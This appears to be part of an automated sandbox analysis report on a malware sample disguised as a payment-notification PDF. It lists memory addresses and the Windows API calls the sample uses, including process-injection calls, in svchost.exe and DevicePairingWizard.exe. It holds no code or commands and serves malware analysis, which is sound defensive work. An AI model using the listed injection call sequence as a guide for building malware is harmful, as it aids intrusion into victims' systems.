Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C30 NtMapViewOfSection,	2_2_03272C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273C30 NtOpenProcessToken,	2_2_03273C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C10 NtOpenProcess,	2_2_03272C10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C50 NtUnmapViewOfSection,	2_2_03272C50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273C90 NtOpenThread,	2_2_03273C90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtDelayExecution,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CD0 NtEnumerateKey,	2_2_03272CD0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04594570 NtSuspendThread,LdrInitializeThunk,	12_2_04594570
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04594260 NtSetContextThread,LdrInitializeThunk,	12_2_04594260
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592C50 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_04592C50
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592C30 NtMapViewOfSection,LdrInitializeThunk,	12_2_04592C30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592CF0 NtDelayExecution,LdrInitializeThunk,	12_2_04592CF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592D10 NtQuerySystemInformation,LdrInitializeThunk,	12_2_04592D10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592DA0 NtReadVirtualMemory,LdrInitializeThunk,	12_2_04592DA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592E50 NtCreateSection,LdrInitializeThunk,	12_2_04592E50
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592E00 NtQueueApcThread,LdrInitializeThunk,	12_2_04592E00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592ED0 NtResumeThread,LdrInitializeThunk,	12_2_04592ED0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592F00 NtCreateFile,LdrInitializeThunk,	12_2_04592F00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045929F0 NtReadFile,LdrInitializeThunk,	12_2_045929F0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592A10 NtWriteFile,LdrInitializeThunk,	12_2_04592A10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592AC0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_04592AC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592A80 NtClose,LdrInitializeThunk,	12_2_04592A80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592B10 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_04592B10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592B00 NtQueryValueKey,LdrInitializeThunk,	12_2_04592B00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592BC0 NtQueryInformationToken,LdrInitializeThunk,	12_2_04592BC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592B90 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_04592B90
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592B80 NtCreateKey,LdrInitializeThunk,	12_2_04592B80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045934E0 NtCreateMutant,LdrInitializeThunk,	12_2_045934E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045938D0 NtGetContextThread,LdrInitializeThunk,	12_2_045938D0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592C10 NtOpenProcess,	12_2_04592C10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592C20 NtSetInformationFile,	12_2_04592C20
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592CD0 NtEnumerateKey,	12_2_04592CD0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592D50 NtWriteVirtualMemory,	12_2_04592D50
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592DC0 NtAdjustPrivilegesToken,	12_2_04592DC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592EC0 NtQuerySection,	12_2_04592EC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592E80 NtCreateProcessEx,	12_2_04592E80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592EB0 NtProtectVirtualMemory,	12_2_04592EB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592F30 NtOpenDirectoryObject,	12_2_04592F30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592FB0 NtSetValueKey,	12_2_04592FB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045929D0 NtWaitForSingleObject,	12_2_045929D0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592AA0 NtQueryInformationFile,	12_2_04592AA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592B20 NtQueryInformationProcess,	12_2_04592B20
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04592BE0 NtQueryVirtualMemory,	12_2_04592BE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04593C30 NtOpenProcessToken,	12_2_04593C30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04593C90 NtOpenThread,	12_2_04593C90
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441EFCA NtQueryInformationProcess,NtReadVirtualMemory,	12_2_0441EFCA
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441EFD8 NtQueryInformationProcess,	12_2_0441EFD8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441FB78 NtSetContextThread,NtResumeThread,	12_2_0441FB78
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441FB2D NtSetContextThread,	12_2_0441FB2D

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_00431BE8: GetFullPathNameW,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00431BE8

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00446313

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

0_2_004333BE

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004096A0	0_2_004096A0
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0042200C	0_2_0042200C
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0041A217	0_2_0041A217
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00412216	0_2_00412216
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0042435D	0_2_0042435D
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004033C0	0_2_004033C0
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044F430	0_2_0044F430
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004125E8	0_2_004125E8
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044663B	0_2_0044663B
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00413801	0_2_00413801
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0042096F	0_2_0042096F
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004129D0	0_2_004129D0
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004119E3	0_2_004119E3
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0041C9AE	0_2_0041C9AE
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0047EA6F	0_2_0047EA6F
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0040FA10	0_2_0040FA10
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044EB5F	0_2_0044EB5F
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00423C81	0_2_00423C81
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00411E78	0_2_00411E78
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00442E0C	0_2_00442E0C
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00420EC0	0_2_00420EC0
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044CF17	0_2_0044CF17
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00444FD2	0_2_00444FD2
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_04123658	0_2_04123658
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00538953	2_2_00538953
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005217D5	2_2_005217D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0054F013	2_2_0054F013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00523120	2_2_00523120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005301FB	2_2_005301FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00530203	2_2_00530203
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00522BD4	2_2_00522BD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00522BE0	2_2_00522BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00522390	2_2_00522390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00536B9F	2_2_00536B9F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00522388	2_2_00522388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00536BA3	2_2_00536BA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0052E44A	2_2_0052E44A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00530423	2_2_00530423
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0052E4A3	2_2_0052E4A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005226DE	2_2_005226DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005226E0	2_2_005226E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00524745	2_2_00524745
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00521FFC	2_2_00521FFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF330	2_2_032FF330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E310	2_2_0324E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231380	2_2_03231380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F124C	2_2_032F124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03202245	2_2_03202245
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D2EC	2_2_0322D2EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD130	2_2_032DD130
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F113	2_2_0322F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330010E	2_2_0330010E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328717A	2_2_0328717A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B1E0	2_2_0325B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032451C0	2_2_032451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE076	2_2_032EE076
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032300A0	2_2_032300A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327508C	2_2_0327508C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70F1	2_2_032F70F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B0D0	2_2_0324B0D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03201707	2_2_03201707
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242760	2_2_03242760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A760	2_2_0324A760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6757	2_2_032F6757
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD62C	2_2_032DD62C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C600	2_2_0325C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264670	2_2_03264670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ED646	2_2_032ED646
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C6E0	2_2_0323C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B36EC	2_2_032B36EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF6F6	2_2_032FF6F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA6C0	2_2_032FA6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A526	2_2_0330A526
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF5C9	2_2_032FF5C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F75C6	2_2_032F75C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240445	2_2_03240445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD480	2_2_032AD480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB2E	2_2_032FFB2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240B10	2_2_03240B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DB19	2_2_0327DB19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4BC0	2_2_032B4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCA13	2_2_032FCA13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEA5B	2_2_032FEA5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FAA0	2_2_0325FAA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA89	2_2_032FFA89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323E9A0	2_2_0323E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FE9A6	2_2_032FE9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032099E8	2_2_032099E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032859C0	2_2_032859C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0835	2_2_032E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243800	2_2_03243800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E810	2_2_0326E810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03226868	2_2_03226868
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249870	2_2_03249870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B870	2_2_0325B870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5870	2_2_032B5870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF872	2_2_032FF872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B98B2	2_2_032B98B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256882	2_2_03256882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F78F3	2_2_032F78F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032428C0	2_2_032428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F18DA	2_2_032F18DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CF00	2_2_0324CF00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF63	2_2_032FFF63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BFF40	2_2_032BFF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEFBF	2_2_032FEFBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03246FE0	2_2_03246FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1FC6	2_2_032F1FC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0E6D	2_2_032E0E6D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282E48	2_2_03282E48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260E50	2_2_03260E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0EAD	2_2_032F0EAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241EB2	2_2_03241EB2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232EE8	2_2_03232EE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F9ED2	2_2_032F9ED2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFD27	2_2_032FFD27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323AD00	2_2_0323AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240D69	2_2_03240D69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D4C	2_2_032F7D4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252DB0	2_2_03252DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DFDF4	2_2_032DFDF4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249DD0	2_2_03249DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AC20	2_2_0324AC20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEC20	2_2_032BEC20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230C12	2_2_03230C12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243C60	2_2_03243C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6C69	2_2_032F6C69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEC60	2_2_032FEC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EEC4C	2_2_032EEC4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D9C98	2_2_032D9C98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C7CE8	2_2_032C7CE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FCE0	2_2_0325FCE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330ACEB	2_2_0330ACEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258CDF	2_2_03258CDF
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D078F6	11_2_02D078F6
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D078FA	11_2_02D078FA
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CFF1A1	11_2_02CFF1A1
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D0117A	11_2_02D0117A
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D09610	11_2_02D09610
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D00F52	11_2_02D00F52
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D00F5A	11_2_02D00F5A
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CF549C	11_2_02CF549C
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D1FD6A	11_2_02D1FD6A
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04560445	12_2_04560445
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0462A526	12_2_0462A526
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04584670	12_2_04584670
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0457C600	12_2_0457C600
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461A6C0	12_2_0461A6C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0455C6E0	12_2_0455C6E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04560680	12_2_04560680
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04616757	12_2_04616757
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0456A760	12_2_0456A760
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04562760	12_2_04562760
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0460E076	12_2_0460E076
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045500A0	12_2_045500A0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0462010E	12_2_0462010E
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04522245	12_2_04522245
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0456E310	12_2_0456E310
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461EC60	12_2_0461EC60
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04616C69	12_2_04616C69
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0460EC4C	12_2_0460EC4C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04550C12	12_2_04550C12
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0456AC20	12_2_0456AC20
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045DEC20	12_2_045DEC20
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04578CDF	12_2_04578CDF
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0462ACEB	12_2_0462ACEB
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04560D69	12_2_04560D69
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0455AD00	12_2_0455AD00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04572DB0	12_2_04572DB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04580E50	12_2_04580E50
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04600E6D	12_2_04600E6D
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045A2E48	12_2_045A2E48
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04552EE8	12_2_04552EE8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04610EAD	12_2_04610EAD
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0456CF00	12_2_0456CF00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04566FE0	12_2_04566FE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461EFBF	12_2_0461EFBF
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04546868	12_2_04546868
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0458E810	12_2_0458E810
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04600835	12_2_04600835
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045628C0	12_2_045628C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04576882	12_2_04576882
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461E9A6	12_2_0461E9A6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0455E9A0	12_2_0455E9A0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461EA5B	12_2_0461EA5B
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461CA13	12_2_0461CA13
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04560B10	12_2_04560B10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045D4BC0	12_2_045D4BC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045F5490	12_2_045F5490
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045CD480	12_2_045CD480
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_046175C6	12_2_046175C6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461F5C9	12_2_0461F5C9
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0460D646	12_2_0460D646
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045FD62C	12_2_045FD62C
